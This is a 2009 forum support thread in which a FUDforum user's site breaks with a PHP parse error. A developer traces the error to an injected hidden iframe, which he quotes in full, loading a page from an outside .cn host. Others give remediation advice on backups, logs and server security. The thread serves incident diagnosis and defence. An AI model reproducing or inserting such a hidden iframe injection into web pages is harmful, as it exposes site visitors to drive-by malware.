FUDforum
Fast Uncompromising Discussions. FUDforum will get your users talking.

Home » FUDforum Development » Bug Reports » Parse error: syntax error, unexpected '?' in
Show: Today's Messages :: Unread Messages :: Show Polls :: Message Navigator
| Subscribe to topic | Bookmark topic 
Switch to threaded view of this topic Create a new topic Submit Reply
Parse error: syntax error, unexpected '?' in [message #158229] Wed, 11 February 2009 12:58 Go to next message
datasound is currently offline  datasound   United States
Messages: 3
Registered: February 2009
Karma: 0
Junior Member
add to buddy list
ignore all messages by this user
When trying to view my forum, this is what I get.

Parse error: syntax error, unexpected '?' in /misc/21/148/893/346/0/user/web/forum.datasound.us/forum/index.php on line 1182

Everything was working great for years. Never any problems. I have made no changes.
I have attached the index.php file if someone thinks they can help.
Re: Parse error: syntax error, unexpected '?' in [message #158231 is a reply to message #158229] Wed, 11 February 2009 13:11 Go to previous messageGo to next message
naudefj is currently offline  naudefj   South Africa
Messages: 3631
Registered: December 2004
Karma: 17
Senior Member
Administrator
Core Developer
add to buddy list
ignore all messages by this user
Please remember to attach the file or PM it to me.
Re: Parse error: syntax error, unexpected '?' in [message #158232 is a reply to message #158231] Wed, 11 February 2009 14:26 Go to previous messageGo to next message
datasound is currently offline  datasound   United States
Messages: 3
Registered: February 2009
Karma: 0
Junior Member
add to buddy list
ignore all messages by this user
Ooops.

There ya go. Thanks

***File deleted now***

[Updated on: Wed, 11 February 2009 15:32]

Report message to a moderator

Re: Parse error: syntax error, unexpected '?' in [message #158233 is a reply to message #158232] Wed, 11 February 2009 15:07 Go to previous messageGo to next message
naudefj is currently offline  naudefj   South Africa
Messages: 3631
Registered: December 2004
Karma: 17
Senior Member
Administrator
Core Developer
add to buddy list
ignore all messages by this user
The line in error (last line of the file) is:
?<html><body><iframe src="http://litetopfindworld.cn/in.cgi?cocacola48" width=1 height=1 style="visibility: hidden"></iframe></body></html>>


Have you made any recent theme changes? If so, please undo them and recompile your theme (I assume you can still login to the Admin Control Panel).

Another quick solution would be to download the latest upgrade script as it will undo your theme changes. However, please backup your DB and files before you do!

Best of luck!

Frank
Re: Parse error: syntax error, unexpected '?' in [message #158234 is a reply to message #158233] Wed, 11 February 2009 15:19 Go to previous messageGo to next message
datasound is currently offline  datasound   United States
Messages: 3
Registered: February 2009
Karma: 0
Junior Member
add to buddy list
ignore all messages by this user
I was just looking at that last line. No I didn't make any changes.
How in the world could that have goten added?

It's gone and all seems ok now.

Thanks

Re: Parse error: syntax error, unexpected '?' in [message #158237 is a reply to message #158234] Wed, 11 February 2009 15:56 Go to previous messageGo to next message
naudefj is currently offline  naudefj   South Africa
Messages: 3631
Registered: December 2004
Karma: 17
Senior Member
Administrator
Core Developer
add to buddy list
ignore all messages by this user
Yes, that is the million dollar question. Some suggestions going forward:

- Backup the forum files & database daily
- Check your access_log and error_log for irregular activity
- Secure/ re-secure the server
Re: Parse error: syntax error, unexpected '?' in [message #158240 is a reply to message #158229] Wed, 11 February 2009 21:41 Go to previous messageGo to next message
Marticus   United States
Messages: 272
Registered: June 2002
Karma: 1
Senior Member
add to buddy list
ignore all messages by this user
If you're on a shared server, another customer could have been hacked if you can guarantee the security of your site (check your other applications as they could be vulnerable to attack). I bet if the host examined all the sites on your server, they would probably find many of them compromised in the same manner. If the latter is true, urge your host to secure their services in such a way as to prevent vulnerable sites from affecting other customers.

Also if they confirm multiple sites are hacked, you might want to consider two things, migrate to another one of their servers, or migrate to a new host. In either case, upload your site's content again, assuming it is more than just forums. Update all of your applications with latest releases and security fixes, forums et al. Make use of securityfocus' vulnerability list.

Lastly and strictly speaking, you can no longer trust the integrity of your site. Assume it is compromised beyond the simple iframe hack and reupload everything. While this is true of -all- data on your site, your forum data is most likely safe, as fudforum has a very long history of security goodness, and whatever script was run to add the iframe was probably just looking for index files to modify.

Best Regards

your friendly neighborhood IT security consultant
Re: Parse error: syntax error, unexpected '?' in [message #158543 is a reply to message #158240] Tue, 03 March 2009 01:10 Go to previous message
naudefj is currently offline  naudefj   South Africa
Messages: 3631
Registered: December 2004
Karma: 17
Senior Member
Administrator
Core Developer
add to buddy list
ignore all messages by this user
I trust this problem was resolved. If not, this may help: http://cvs.prohost.org/index.php/Securing
Quick Reply
Formatting Tools:   
  Switch to threaded view of this topic Create a new topic
Previous Topic: maillist import from html to utf-8 incorrect
Next Topic: compact messages: embedded files
Goto Forum:
  

-=] Back to Top [=-
[ Syndicate this forum (XML) ] [ RSS ]

Current Time: Mon Dec 11 14:20:48 EST 2017

Total time taken to generate the page: 0.00824 seconds